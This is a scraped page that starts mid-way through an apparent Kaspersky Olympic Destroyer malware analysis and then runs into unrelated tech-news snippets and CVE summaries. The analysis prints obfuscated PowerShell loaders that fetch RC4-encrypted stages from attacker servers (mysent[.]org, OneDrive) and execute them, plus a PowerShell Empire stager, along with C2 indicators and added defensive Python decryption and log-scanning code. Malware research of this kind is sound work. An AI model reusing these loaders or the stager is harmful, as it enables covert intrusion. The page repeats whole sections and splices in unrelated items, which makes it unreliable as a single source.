${k}=  (  .VARiabLE Bqvm  ).vAlUE::"aSCiI".GETBYtes.Invoke(d209233c7d7d7acee5aa0e8b0889bb1e);
${R}={
${D},${K}=${aRGS};
${s}=0..255;0..255^|^&('%'){
	${J}=(${j}+${S}[${_}]+${K}[${_}%${k}."coUNt"])%256;
	${S}[${_}],${S}[${j}]=${S}[${J}],${S}[${_}]
};
${d}^|^&('%'){
	${i}=(${i}+1)%256;
	${h}=(${h}+${s}[${I}])%256;
	${S}[${i}],${S}[${h}]=${s}[${h}],${s}[${I}];
	${_}-Bxor${S}[(${S}[${I}]+${s}[${h}])%256]
}};
${daTa}=${wc}.DOWNloADDatA.Invoke(https://api.onedrive[.]com/v1.0/shares/s!ArI-XSG7nP5zbTpZANb3-dz_oU8/driveitem/content);
${IV}=${dATa}[0..3];
${dATa}=${dATA}[4..${dAta}."LENgtH"];
-JoIn[CHar[]](^& ${r} ${daTa} (${iV}+${k}))

The second stage payload downloaded is an HTA file that also executes a Powershell script.

Downloaded access.log.txt

This file has a similar structure to the Powershell script executed by the macro in spear-phishing attachments. After deobfuscating it, we can see that this script also disables Powershell logging and downloads the next stage payload from the same server address. It also uses RC4 with a pre-defined key:

${k}=  (  Get-vaRiablE  R4Imz  -VAl  )::"aSCIi".GEtBytEs.Invoke(d209233c7d7d7acee5aa0e8b0889bb1e);
${r}={${D},${K}=${ARGs};
${s}=0..255;
0..255^|.('%'){${j}=(${j}+${S}[${_}]+${k}[${_}%${K}."COUNT"])%256;
${S}[${_}],${s}[${J}]=${s}[${j}],${s}[${_}]};
${d}^|.('%'){${I}=(${I}+1)%256;
${h}=(${h}+${S}[${I}])%256;
${s}[${I}],${S}[${H}]=${s}[${h}],${s}[${i}];
${_}-BxOR${s}[(${s}[${i}]+${S}[${h}])%256]}};
${wC}."HeaDErS".Add.Invoke(Cookie,session=B43mgpQ4No69GDp3PmklQpTZB5Q=);
${SeR}=https://mysent[.]org:443;
${t}=/modules/admin.php;
${dATA}=${wc}.DOWNLOAdDaTA.Invoke(${SeR}+${t});
${iV}=${DATA}[0..3];
${DATA}=${dATA}[4..${dAta}."LeNGTh"];
-JoiN[ChAR[]](^& ${R} ${daTa} (${IV}+${k}))
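Both the macro stage and the downloaded HTA stage above use the same decryption scheme: the first four bytes of the download are an IV, the RC4 key is that IV followed by the 32 ASCII bytes of the hard-coded hex string, and the decrypted bytes are turned into characters one byte per char. Anyone holding a captured blob and the key can therefore decrypt the next stage offline. The Python below is an added example re-implementing that routine; it is not code from the Kaspersky report. The key is the one shown in the scripts, while the encrypted sample is constructed in the block itself (RC4 is symmetric, so the same function builds it), and the plaintext is a stand-in, not a real payload.

```python
# Added example (not from the Kaspersky report): the RC4 payload-decryption scheme used by
# the macro stage and the HTA stage. Key and IV handling mirror the PowerShell above.

HEX_KEY = b"d209233c7d7d7acee5aa0e8b0889bb1e"  # hard-coded key from the scripts: 32 ASCII bytes


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA then PRGA keystream XOR). The same call encrypts and decrypts."""
    if not key:
        raise ValueError("RC4 key must not be empty")
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def decrypt_stage(blob: bytes, hex_key: bytes = HEX_KEY) -> bytes:
    """Mirror of the PowerShell: blob[0..3] is the IV, key = IV + hex_key, blob[4..] is ciphertext."""
    if len(blob) < 4:
        raise ValueError("blob too short to carry a 4-byte IV")
    iv, ciphertext = blob[:4], blob[4:]
    return rc4(iv + hex_key, ciphertext)


def decrypt_stage_text(blob: bytes, hex_key: bytes = HEX_KEY) -> str:
    """The scripts finish with -Join [char[]], i.e. one char per byte; latin-1 reproduces that."""
    return decrypt_stage(blob, hex_key).decode("latin-1")


def encrypt_stage(plaintext: bytes, iv: bytes, hex_key: bytes = HEX_KEY) -> bytes:
    """Inverse operation, used here only to build a constructed sample blob."""
    if len(iv) != 4:
        raise ValueError("IV must be exactly 4 bytes")
    return iv + rc4(iv + hex_key, plaintext)


# Constructed sample: a stand-in for a downloaded HTA, not a real captured payload.
SAMPLE_PLAINTEXT = b"<html><script language='VBScript'>' stand-in stage 2</script></html>"
SAMPLE_BLOB = encrypt_stage(SAMPLE_PLAINTEXT, b"\x01\x02\x03\x04")

if __name__ == "__main__":
    print(decrypt_stage_text(SAMPLE_BLOB))
```

The usual mistake when reproducing this by hand is to hex-decode the key to 16 bytes; the script calls ASCII.GetBytes on the string, so the key schedule consumes the 32 characters, and the 4-byte prefix on each download changes the keystream per blob without any real secrecy.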

The final payload is the PowerShell Empire agent. Below is part of the HTTP stager scriptlet for the downloaded Empire agent.

$wc.HeAders.Add("User-Agent",$UA);
 $raw = $wc.UploadData($s + "/modules/admin.php","POST",$rc4p2);
 Invoke-Expression $($e.GetSTRiNG($(DecrYPT-BYtEs -KeY $kEy -In $raW)));
 $AES = $NuLl;
 …
 [GC]::COLLEcT(); 
 Invoke-Empire -Servers @(($s -split "/")[0..2] -join "/") -StagingKey $SK -SessionKey $key -SessionID $ID -WorkingHours "WORKING_HOURS_REPLACE" -KillDate "REPLACE_KILLDATE" -ProxySettings $Script:Proxy; }

PowerShell Empire is a free, open-source post-exploitation framework written in Python and PowerShell. It allows fileless control of compromised hosts, has a modular architecture and relies on encrypted communication. The framework is widely used by penetration-testing companies in legitimate security tests for lateral movement and information gathering.

Infrastructure

We believe that the attackers used compromised legitimate web servers to host and control the malware. Based on our analysis, the URI paths of the discovered C2 servers included the following:

  • /components/com_tags/views
  • /components/com_tags/views/admin
  • /components/com_tags/controllers
  • /components/com_finder/helpers
  • /components/com_finder/views/
  • /components/com_j2xml/
  • /components/com_contact/controllers/

These are known directory structures used by a popular open source content management system, Joomla:

Joomla components path on Github

Unfortunately we don’t know what exact vulnerability was exploited in the Joomla CMS. What is known is that one of the payload hosting servers used Joomla v1.7.3, which is an extremely old version of this software, released in November 2011.

A compromised server using Joomla

Victims and Targets

Based on several target profiles and limited victim reports, we believe that the recent operation by Olympic Destroyer targets Russia, Ukraine and several other European countries. According to our telemetry, several victims are entities from the financial sector in Russia. In addition, almost all the samples we found were uploaded to a multi-scanner service from European countries such as the Netherlands, Germany and France, as well as from Ukraine and Russia.

Location of targets in recent Olympic Destroyer attacks

Since our visibility is limited, we can only speculate about the potential targets based on the profiles suggested by the content of selected decoy documents, email subjects or even file names picked by the attackers.

One such decoy document grabbed our attention. It referred to ‘Spiez Convergence’, a bio-chemical threat research conference held in Switzerland, organized by SPIEZ LABORATORY, which not long ago was involved in the Salisbury attack investigation.

Decoy document using Spiez Convergence topic

Another decoy document observed in the attacks (‘Investigation_file.doc’) references the nerve agent used to poison Sergey Skripal and his daughter in Salisbury.

Some other spear-phishing documents include words in the Russian and German language in their names:

  • 9bc365a16c63f25dfddcbe11da042974 Korporativ.doc
  • da93e6651c5ba3e3e96f4ae2dd763d94 Korporativ_2018.doc
  • e2e102291d259f054625cc85318b7ef5 E-Mail-Adressliste_2018.doc

One of the documents included a lure image with perfect Russian language in it.

A message in Russian encouraging the user to enable macro (54b06b05b6b92a8f2ff02fdf47baad0e)

One of the most recent weaponized documents was uploaded to a malware scanning service from Ukraine in a file named ‘nakaz.zip’, containing ‘nakaz.doc’ (translated as ‘order.doc’ from Ukrainian).

Another lure message to encourage the user to enable macro

According to metadata, the document was edited on June 14th. The Cyrillic messages inside this and previous documents are in perfect Russian, suggesting that it was probably prepared with the help of a native speaker and not automated translation software.

Once the user enables macro, a decoy document is displayed, taken very recently from a Ukrainian state organization (the date inside indicates 11 June 2018). The text of the document is identical to the one on the official website of the Ukrainian Ministry of Health.

Decoy document inside nakaz.doc

Further analysis of other related files suggests that the target of this document works in the field of biological and epizootic threat prevention.

Attribution

Although not comprehensive, the following findings can serve as a hint to those looking for a better connection between this campaign and previous Olympic Destroyer activity. More information on overlaps and reliable tracking of Olympic Destroyer attacks is available to subscribers of Kaspersky Intelligence Reporting Services (see below).

Similar obfuscated macro structure

The documents above show apparent structural similarity as if they were produced by the same tool and obfuscator. The highlighted function name in the new wave of attacks isn’t in fact new. While being uncommon, a function named “MultiPage1_Layout” was also found in the Olympic Destroyer spear phishing document (MD5: 5ba7ec869c7157efc1e52f5157705867).

Same MultiPage1_Layout function name used in older campaign

Conclusions

Despite initial expectations for it to stay low or even disappear, Olympic Destroyer has resurfaced with new attacks in Europe, Russia and Ukraine. In late 2017, a similar reconnaissance stage preceded a larger cyber-sabotage stage meant to destroy and paralyze infrastructure of the Winter Olympic Games as well as related supply chains, partners and even venues at the event location. It’s possible that in this case we have observed a reconnaissance stage that will be followed by a wave of destructive attacks with new motives. That is why it is important for all bio-chemical threat prevention and research companies and organizations in Europe to strengthen their security and run unscheduled security audits.

The variety of financial and non-financial targets could indicate that the same malware was used by several groups with different interests – i.e. a group primarily interested in financial gain through cybertheft and another group or groups looking for espionage targets. This could also be a result of cyberattack outsourcing, which is not uncommon among nation state actors. On the other hand, the financial targets might be another false flag operation by an actor who has already excelled at this during the Pyeongchang Olympics to redirect researchers’ attention.

Certain conclusions could be made based on motives and the selection of targets in this campaign. However, it is easy to make a mistake when trying to answer the question of who is behind this campaign with only the fragments of the picture that are visible to researchers. The appearance, at the start of this year, of Olympic Destroyer with its sophisticated deception efforts, changed the attribution game forever. We believe that it is no longer possible to draw conclusions based on few attribution vectors discovered during regular investigation. The resistance to and deterrence of threats such as Olympic Destroyer should be based on cooperation between the private sector and governments across national borders. Unfortunately, the current geopolitical situation in the world only boosts the global segmentation of the internet and introduces many obstacles for researchers and investigators. This will encourage APT attackers to continue marching into the protected networks of foreign governments and commercial companies.

The best thing we can do as researchers is to keep tracking threats like this. We will keep monitoring Olympic Destroyer and report on new discovered activities of this group.

More details about Olympic Destroyer and related activity are available to subscribers of Kaspersky Intelligence Reporting services. Contact: intelreports@kaspersky.com

Indicators Of Compromise

File Hashes

9bc365a16c63f25dfddcbe11da042974 Korporativ.doc
da93e6651c5ba3e3e96f4ae2dd763d94 Korporativ_2018.doc
6ccd8133f250d4babefbd66b898739b9 corporativ_2018.doc
abe771f280cdea6e7eaf19a26b1a9488 Scan-2018-03-13.doc.bin
b60da65b8d3627a89481efb23d59713a Corporativ_2018.doc
b94bdb63f0703d32c20f4b2e5500dbbe
bb5e8733a940fedfb1ef6b0e0ec3635c recommandation.doc
97ddc336d7d92b7db17d098ec2ee6092 recommandation.doc
1d0cf431e623b21aeae8f2b8414d2a73 Investigation_file.doc
0e7b32d23fbd6d62a593c234bafa2311 Spiez CONVERGENCE.doc
e2e102291d259f054625cc85318b7ef5 E-Mail-Adressliste_2018.doc
0c6ddc3a722b865cc2d1185e27cef9b8
54b06b05b6b92a8f2ff02fdf47baad0e
4247901eca6d87f5f3af7df8249ea825 nakaz.doc

Domains and IPs

79.142.76[.]40:80/news.php
79.142.76[.]40:8989/login/process.php
79.142.76[.]40:8989/admin/get.php
159.148.186[.]116:80/admin/get.php
159.148.186[.]116:80/login/process.php
159.148.186[.]116:80/news.php
ppgca.ufob.edu[.]br/components/com_finder/helpers/access.log
ppgca.ufob.edu[.]br/components/com_finder/views/default.php
narpaninew.linuxuatwebspiders[.]com/components/com_j2xml/error.log
narpaninew.linuxuatwebspiders[.]com/components/com_contact/controllers/main.php
mysent[.]org/access.log.txt
mysent[.]org/modules/admin.php
5.133.12[.]224:333/admin/get.php
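To put the network indicators above and the Joomla observation from the Infrastructure section to work, the Python below (an added example, not Kaspersky's code) refangs the defanged list, drops the port so a proxy that logged a different port still matches, and runs it over constructed proxy-log lines. It also flags direct requests to files under Joomla `components/` directories as a weaker, review-only signal, since normal Joomla traffic is routed through index.php; that heuristic and the log line format are assumptions, and the hosts in the sample lines other than the listed IOCs are placeholders.

```python
import re

# Added example (not from the Kaspersky report): match the page's defanged network IOCs,
# plus a Joomla component-path heuristic, against constructed proxy-log lines.

RAW_NETWORK_IOCS = """
79.142.76[.]40:80/news.php
79.142.76[.]40:8989/login/process.php
79.142.76[.]40:8989/admin/get.php
159.148.186[.]116:80/admin/get.php
159.148.186[.]116:80/login/process.php
159.148.186[.]116:80/news.php
ppgca.ufob.edu[.]br/components/com_finder/helpers/access.log
ppgca.ufob.edu[.]br/components/com_finder/views/default.php
narpaninew.linuxuatwebspiders[.]com/components/com_j2xml/error.log
narpaninew.linuxuatwebspiders[.]com/components/com_contact/controllers/main.php
mysent[.]org/access.log.txt
mysent[.]org/modules/admin.php
5.133.12[.]224:333/admin/get.php
"""

# Joomla component directories the report saw abused on compromised hosts. Assumption:
# front-end Joomla traffic goes through index.php, so direct fetches of .php/.log/.txt
# files under these directories are unusual enough to review, but they are not proof.
JOOMLA_COMPONENT_DIRS = ("/components/com_tags/", "/components/com_finder/",
                         "/components/com_j2xml/", "/components/com_contact/")


def refang(indicator: str) -> str:
    """Turn the defanged '[.]' / 'hxxp' spellings back into matchable text."""
    return indicator.replace("[.]", ".").replace("hxxp", "http")


def parse_network_iocs(text: str):
    """Return a set of (host, path) pairs with ports removed and hosts lower-cased."""
    iocs = set()
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        hostport, _, path = refang(line).partition("/")
        iocs.add((hostport.split(":")[0].lower(), "/" + path))
    return iocs


# Assumed log shape: "<timestamp> <client-ip> <METHOD> <url> <status>"
LOG_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<method>[A-Z]+)\s+(?P<url>\S+)\s+(?P<status>\d{3})$")
URL_RE = re.compile(r"^https?://(?P<host>[^/:]+)(?::\d+)?(?P<path>/[^?#]*)?", re.IGNORECASE)


def match_proxy_log(lines, iocs):
    """Return [(client, url, reason)]; 'exact' = listed host+path, 'joomla-path' = heuristic only."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        u = URL_RE.match(m["url"])
        if not u:
            continue
        host, path = u["host"].lower(), (u["path"] or "/")
        if (host, path) in iocs:
            hits.append((m["client"], m["url"], "exact"))
        elif any(path.startswith(d) for d in JOOMLA_COMPONENT_DIRS) and path.endswith((".php", ".log", ".txt")):
            hits.append((m["client"], m["url"], "joomla-path"))
    return hits


# Constructed sample log; example.com / example.org are placeholders, not observed hosts.
SAMPLE_LOG = [
    "2018-06-14T10:02:11Z 10.1.2.3 GET http://79.142.76.40:8989/admin/get.php 200",
    "2018-06-14T10:02:12Z 10.1.2.3 GET https://mysent.org/access.log.txt 200",
    "2018-06-14T10:03:40Z 10.1.2.7 GET http://example.com/components/com_tags/views/admin/run.php 200",
    "2018-06-14T10:04:00Z 10.1.2.9 GET https://www.example.org/index.php?option=com_content 200",
]

if __name__ == "__main__":
    for client, url, reason in match_proxy_log(SAMPLE_LOG, parse_network_iocs(RAW_NETWORK_IOCS)):
        print(f"{client} -> {url} [{reason}]")
```

Treat a `joomla-path` hit as a lead to pivot on (which host, which client, what came back), not as an alert on its own; the exact matches are the ones worth paging for.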




Another lure message to encourage the user to enable macro

According to metadata, the document was edited on June 14th. The Cyrillic messages inside this and previous documents are in perfect Russian, suggesting that it was probably prepared with the help of a native speaker and not automated translation software.

Once the user enables macro, a decoy document is displayed, taken very recently from a Ukrainian state organization (the date inside indicates 11 June 2018). The text of the document is identical to the one on the official website of the Ukrainian Ministry of Health.

Decoy document inside nakaz.doc

Further analysis of other related files suggests that the target of this document works in the biological and epizootic threat prevention field.

Attribution

Although not comprehensive, the following findings can serve as a hint to those looking for a better connection between this campaign and previous Olympic Destroyer activity. More information on overlaps and reliable tracking of Olympic Destroyer attacks is available to subscribers of Kaspersky Intelligence Reporting Services (see below).

Similar obfuscated macro structure

The documents above show apparent structural similarity as if they were produced by the same tool and obfuscator. The highlighted function name in the new wave of attacks isn’t in fact new. While being uncommon, a function named “MultiPage1_Layout” was also found in the Olympic Destroyer spear phishing document (MD5: 5ba7ec869c7157efc1e52f5157705867).

Same MultiPage1_Layout function name used in older campaign

Conclusions

Despite initial expectations for it to stay low or even disappear, Olympic Destroyer has resurfaced with new attacks in Europe, Russia and Ukraine. In late 2017, a similar reconnaissance stage preceded a larger cyber-sabotage stage meant to destroy and paralyze infrastructure of the Winter Olympic Games as well as related supply chains, partners and even venues at the event location. It’s possible that in this case we have observed a reconnaissance stage that will be followed by a wave of destructive attacks with new motives. That is why it is important for all bio-chemical threat prevention and research companies and organizations in Europe to strengthen their security and run unscheduled security audits.

The variety of financial and non-financial targets could indicate that the same malware was used by several groups with different interests – i.e. a group primarily interested in financial gain through cybertheft and another group or groups looking for espionage targets. This could also be a result of cyberattack outsourcing, which is not uncommon among nation state actors. On the other hand, the financial targets might be another false flag operation by an actor who has already excelled at this during the Pyeongchang Olympics to redirect researchers’ attention.

Certain conclusions could be made based on motives and the selection of targets in this campaign. However, it is easy to make a mistake when trying to answer the question of who is behind this campaign with only the fragments of the picture that are visible to researchers. The appearance, at the start of this year, of Olympic Destroyer with its sophisticated deception efforts, changed the attribution game forever. We believe that it is no longer possible to draw conclusions based on few attribution vectors discovered during regular investigation. The resistance to and deterrence of threats such as Olympic Destroyer should be based on cooperation between the private sector and governments across national borders. Unfortunately, the current geopolitical situation in the world only boosts the global segmentation of the internet and introduces many obstacles for researchers and investigators. This will encourage APT attackers to continue marching into the protected networks of foreign governments and commercial companies.

The best thing we can do as researchers is to keep tracking threats like this. We will keep monitoring Olympic Destroyer and report on new discovered activities of this group.

More details about Olympic Destroyer and related activity are available to subscribers of Kaspersky Intelligence Reporting services. Contact: intelreports@kaspersky.com

Indicators Of Compromise

File Hashes

9bc365a16c63f25dfddcbe11da042974 Korporativ .doc
da93e6651c5ba3e3e96f4ae2dd763d94 Korporativ_2018.doc
6ccd8133f250d4babefbd66b898739b9 corporativ_2018.doc
abe771f280cdea6e7eaf19a26b1a9488 Scan-2018-03-13.doc.bin
b60da65b8d3627a89481efb23d59713a Corporativ_2018.doc
b94bdb63f0703d32c20f4b2e5500dbbe
bb5e8733a940fedfb1ef6b0e0ec3635c recommandation.doc
97ddc336d7d92b7db17d098ec2ee6092 recommandation.doc
1d0cf431e623b21aeae8f2b8414d2a73 Investigation_file.doc
0e7b32d23fbd6d62a593c234bafa2311 Spiez CONVERGENCE.doc
e2e102291d259f054625cc85318b7ef5 E-Mail-Adressliste_2018.doc
0c6ddc3a722b865cc2d1185e27cef9b8
54b06b05b6b92a8f2ff02fdf47baad0e
4247901eca6d87f5f3af7df8249ea825 nakaz.doc

Domains and IPs

79.142.76[.]40:80/news.php
79.142.76[.]40:8989/login/process.php
79.142.76[.]40:8989/admin/get.php
159.148.186[.]116:80/admin/get.php
159.148.186[.]116:80/login/process.php
159.148.186[.]116:80/news.php
ppgca.ufob.edu[.]br/components/com_finder/helpers/access.log
ppgca.ufob.edu[.]br/components/com_finder/views/default.php
narpaninew.linuxuatwebspiders[.]com/components/com_j2xml/error.log
narpaninew.linuxuatwebspiders[.]com/components/com_contact/controllers/main.php
mysent[.]org/access.log.txt
mysent[.]org/modules/admin.php
5.133.12[.]224:333/admin/get.php
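A practical use of the Infrastructure section and the indicator list above is to run them over outbound web-proxy logs. The following script is an added example, not Kaspersky's code: it refangs the `[.]`-defanged URLs exactly as printed above, matches them against constructed proxy log lines (the log format and the client addresses are made up for the demo), and reports a lower-confidence "review" hit for requests whose path falls under one of the Joomla component directories the report observed, since those directories exist on any Joomla site and only the destination host tells the two apart.

```python
from dataclasses import dataclass
from urllib.parse import urlsplit

# Indicators copied from the report's "Domains and IPs" list, defanged as printed.
C2_URLS = [
    "79.142.76[.]40:80/news.php",
    "79.142.76[.]40:8989/login/process.php",
    "79.142.76[.]40:8989/admin/get.php",
    "159.148.186[.]116:80/admin/get.php",
    "159.148.186[.]116:80/login/process.php",
    "159.148.186[.]116:80/news.php",
    "ppgca.ufob.edu[.]br/components/com_finder/helpers/access.log",
    "ppgca.ufob.edu[.]br/components/com_finder/views/default.php",
    "narpaninew.linuxuatwebspiders[.]com/components/com_j2xml/error.log",
    "narpaninew.linuxuatwebspiders[.]com/components/com_contact/controllers/main.php",
    "mysent[.]org/access.log.txt",
    "mysent[.]org/modules/admin.php",
    "5.133.12[.]224:333/admin/get.php",
]

# Joomla component directories the report saw used as C2 paths. Lower confidence:
# every Joomla site has these, so a hit only means "review the destination host".
C2_PATH_PREFIXES = [
    "/components/com_tags/views",
    "/components/com_tags/views/admin",
    "/components/com_tags/controllers",
    "/components/com_finder/helpers",
    "/components/com_finder/views/",
    "/components/com_j2xml/",
    "/components/com_contact/controllers/",
]


def refang(indicator: str) -> str:
    return indicator.replace("[.]", ".")


def parse_indicator(indicator: str):
    """'host[:port]/path' -> (host, port or None, '/path'); None port matches any port."""
    hostport, _, path = refang(indicator).partition("/")
    host, _, port = hostport.partition(":")
    return host.lower(), (int(port) if port else None), "/" + path


@dataclass
class Hit:
    line_no: int
    client: str
    url: str
    confidence: str   # "high": exact IoC match; "review": known C2 directory only
    indicator: str


def classify_url(url: str):
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    port = parts.port or (443 if parts.scheme == "https" else 80)
    for ioc in C2_URLS:
        ioc_host, ioc_port, ioc_path = parse_indicator(ioc)
        if host == ioc_host and ioc_port in (None, port) and parts.path == ioc_path:
            return "high", ioc
    for prefix in C2_PATH_PREFIXES:
        if parts.path.startswith(prefix):
            return "review", prefix
    return None


def scan_proxy_log(lines):
    """Constructed log format: '<timestamp> <client_ip> <method> <url> <status>'."""
    hits = []
    for n, line in enumerate(lines, 1):
        fields = line.split()
        if len(fields) < 5:
            continue                      # skip malformed lines rather than crash
        verdict = classify_url(fields[3])
        if verdict:
            hits.append(Hit(n, fields[1], fields[3], verdict[0], verdict[1]))
    return hits


# Constructed sample log lines (client addresses and timestamps are made up).
SAMPLE_LOG = [
    "2018-06-19T09:12:44Z 10.0.0.21 GET http://mysent.org/modules/admin.php 200",
    "2018-06-19T09:13:02Z 10.0.0.21 GET https://www.example.com/index.html 200",
    "2018-06-19T09:14:10Z 10.0.0.33 GET http://79.142.76.40:8989/login/process.php 200",
    "2018-06-19T09:15:55Z 10.0.0.33 GET http://cms.example.org/components/com_tags/views/index.php 404",
    "2018-06-19T09:16:00Z 10.0.0.40 GET http://79.142.76.40/news.php 200",
]

if __name__ == "__main__":
    for hit in scan_proxy_log(SAMPLE_LOG):
        print(f"line {hit.line_no}: {hit.confidence:6} {hit.client} -> {hit.url} ({hit.indicator})")
```

Exact matches compare host, port (where the indicator names one) and path, so a hit on `mysent.org/modules/admin.php` over plain HTTP still fires even though the loader used port 443; the path-prefix tier is deliberately reported separately so it can be triaged without polluting the high-confidence alerts.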

Shots Fired Again Between CPU Vendors AMD and Intel

Highdude702 shares a report from Tom's Hardware: AMD's feud with Intel took an interesting turn today as the company announced that it would swap 40 Core i7-8086K's won from Intel's sweepstakes with a much beefier Threadripper 1950X CPU. At Computex 2018, Intel officially announced it was releasing the Core i7-8086K, a special edition processor that commemorates the 40th anniversary of the 8086, which debuted as the first x86 processor on June 8, 1978. Now AMD is offering to replace 40 of the winners' chips with its own 16-core 32-thread $799 Threadripper processors, thus throwing a marketing wrench into Intel's 40th-anniversary celebration. AMD has a list of the complete terms and conditions on its site. But it is also noteworthy that "winners" of AMD's competing sweepstakes will have to pony up for a much more expensive X399 motherboard with the TR4 socket, which currently retails for more than $300, instead of Intel's less-expensive 300-series motherboards. Regardless, those who do swap their Intel Core silicon for an AMD Threadripper chip will gain 10 cores and quad-channel memory, not to mention quite a bit of resale value. In response, Slashdot reader Highdude702 said: "AMD is shooting back at Intel like it's easy for them, even though 40 out of 8086 is kind of stingy. They are acting like they have the horsepower now. I believe it is going to be an interesting time for consumers and enthusiasts coming soon. Maybe we will even get better prices." Intel responded via its official verified "Intel Gaming" Twitter account, tweeting: ".@AMDRyzen, if you wanted an Intel Core i7-8086K processor too, you could have just asked us. :) Thanks for helping us celebrate the 8086!"

Read more of this story at Slashdot.

Surviving new cybercriminal fraud tactics takes greater stealth and sophistication

2017 was bad enough in the world of fraud, with identity theft reaching “epidemic levels”. But 2018 is panning out to be a whole lot worse: identify theft rates have

The post Surviving new cybercriminal fraud tactics takes greater stealth and sophistication appeared first on The Cyber Security Place.

How cloud technology is transforming the healthcare industry

All over the world, many governments face countless issues in their quest for a digitised health service. The healthcare system, as a whole, faces unprecedented challenges, thanks to a reduction

The post How cloud technology is transforming the healthcare industry appeared first on The Cyber Security Place.

Batten Down the Hatches against Crypto-Mining Pirates

Cryptocurrency mining relies on the computational power of the system used to create the currency and process the transactions. Many are realizing that the computational power, which requires a huge

The post Batten Down the Hatches against Crypto-Mining Pirates appeared first on The Cyber Security Place.

TRON Cryptocurrency Founder Buys BitTorrent, µTorrent for $140 Million

BitTorrent, the company which owns the popular file-sharing client uTorrent, has quietly been sold for $140 million in cash to Justin Sun, the founder of blockchain-focused startup TRON. TRON is a decentralized entertainment and content-sharing platform that uses blockchain and distributed storage technology. It allows users to publish content without having to use third-party platforms such

HeroRAT – A totally new Telegram-based Android RAT is spreading in the wild

Malware researchers from ESET have discovered a new strain of Android RAT, tracked as HeroRat, that leverages Telegram protocol for command and control, and data exfiltration.

HeroRat isn’t the first malware abusing the Telegram protocol; past investigations reported similar threats such as TeleRAT and IRRAT.

The new RAT has been in the wild at least since August 2017, and in March 2018 its source code was released for free on Telegram hacking channels, allowing various threat actors to create their own variants.

HeroRat emerged this way, but it differs markedly from the other variants that borrowed the source code: HeroRat is the first Telegram-based malware developed from scratch in C# using the Xamarin framework, whereas previous ones were written in Java.

The RAT leverages the Telesharp library for creating Telegram bots in C#.

“One of these variants is different from the rest – despite the freely available source code, it is offered for sale on a dedicated Telegram channel, marketed under the name HeroRat.” reads the analysis published by ESET. 

“It is available in three pricing models according to functionality, and comes with a support video channel. It is unclear whether this variant was created from the leaked source code, or if it is the “original” whose source code was leaked.”

The malware is distributed through several channels, including third-party app stores, where it is disguised as social media and messaging apps.

Researchers observed the largest number of infections in Iran, where the malicious apps are offered with promises of free bitcoins, free internet connections, and additional followers on social media.


The apps analyzed by ESET show a peculiar behavior: after the malware is installed and launched on the victim’s device, it displays a small popup claiming that the application can’t run on the device and will therefore be uninstalled.

Once the uninstallation is seemingly completed, the icon associated with the app disappears; unfortunately, by then the attacker has already obtained control of the victim’s device.

The attacker leverages the Telegram bot functionality to control the infected device; the malware is able to execute a broad range of commands, including data exfiltration and audio/video recording.

“The malware has a wide array of spying and file exfiltration capabilities, including intercepting text messages and contacts, sending text messages and making calls, audio and screen recording, obtaining device location, and controlling the device’s settings,” continues the analysis.

The source code of HeroRat is offered for sale for 650 USD. The authors also offer three packages of the malware depending on the features implemented: bronze, silver, and gold, which go for 25, 50, and 100 USD, respectively.

The malware’s capabilities are accessible in the form of clickable buttons in the Telegram bot interface. Attackers can control victimized devices by simply tapping the buttons available in the version of the malware they are operating.


The availability of the source code online will drive new versions; the best way to check whether your mobile device has been infected is to scan it with a reliable mobile security solution.

Pierluigi Paganini

(Security Affairs – HeroRat, Telegram)

The post HeroRAT – A totally new Telegram-based Android RAT is spreading in the wild appeared first on Security Affairs.


Ex-CIA employee charged with leaking ‘Vault 7’ hacking tools to Wikileaks

A 29-year-old former CIA computer programmer who was charged with possession of child pornography last year has now been charged with masterminding the largest leak of classified information in the agency's history. Joshua Adam Schulte, who once created malware for both the CIA and NSA to break into adversaries computers, was indicted Monday by the Department of Justice on 13 charges of

Kickstarter Bets On ‘Wired’ Arduino-Compatible IoT Platform

L-One-L-One writes: Most IoT home projects today are based on Wi-Fi, Bluetooth, Zigbee, and friends. But this is not always the ideal solution: you end up swapping batteries frequently, which becomes annoying quite quickly. You also have to deal with signal strength issues and interferences. To address this problem, a new Kickstarter campaign called NoCAN is proposing an Arduino-compatible internet-of-things platform based on wired connections that combine networking and power in one cable. The platform uses a set of cheap Arduino-compatible nodes controlled through a Raspberry Pi. The network uses CAN-bus and offers a publish/subscribe mechanism like MQTT and over-the-network firmware updates. It can also be controlled by a smartphone or tablet. Even with such features, can it succeed in going against the all-wireless trend? We'll know in a few weeks.

Read more of this story at Slashdot.

CVE-2018-12561

An issue was discovered in the cantata-mounter D-Bus service in Cantata through 2.3.1. A regular user can inject additional mount options such as file_mode= by manipulating (for example) the domain parameter of the samba URL.

CVE-2018-12560

An issue was discovered in the cantata-mounter D-Bus service in Cantata through 2.3.1. Arbitrary unmounts can be performed by regular users via directory traversal sequences such as a home/../sys/kernel substring.

CVE-2018-12563

An issue was discovered in Linaro LAVA before 2018.5.post1. Because of support for file: URLs, a user can force lava-server-gunicorn to download any file from the filesystem if it's readable by lavaserver and valid yaml.

CVE-2018-12562

An issue was discovered in the cantata-mounter D-Bus service in Cantata through 2.3.1. The wrapper script 'mount.cifs.wrapper' uses the shell to forward the arguments to the actual mount.cifs binary. The shell evaluates wildcards (such as in an injected string:/home/../tmp/* string).

CVE-2018-12564

An issue was discovered in Linaro LAVA before 2018.5.post1. Because of support for URLs in the submit page, a user can forge an HTTP request that will force lava-server-gunicorn to return any file on the server that is readable by lavaserver and valid yaml.

CVE-2018-12559

An issue was discovered in the cantata-mounter D-Bus service in Cantata through 2.3.1. The mount target path check in mounter.cpp `mpOk()` is insufficient. A regular user can consequently mount a CIFS filesystem anywhere (e.g., outside of the /home directory tree) by passing directory traversal sequences such as a home/../usr substring.
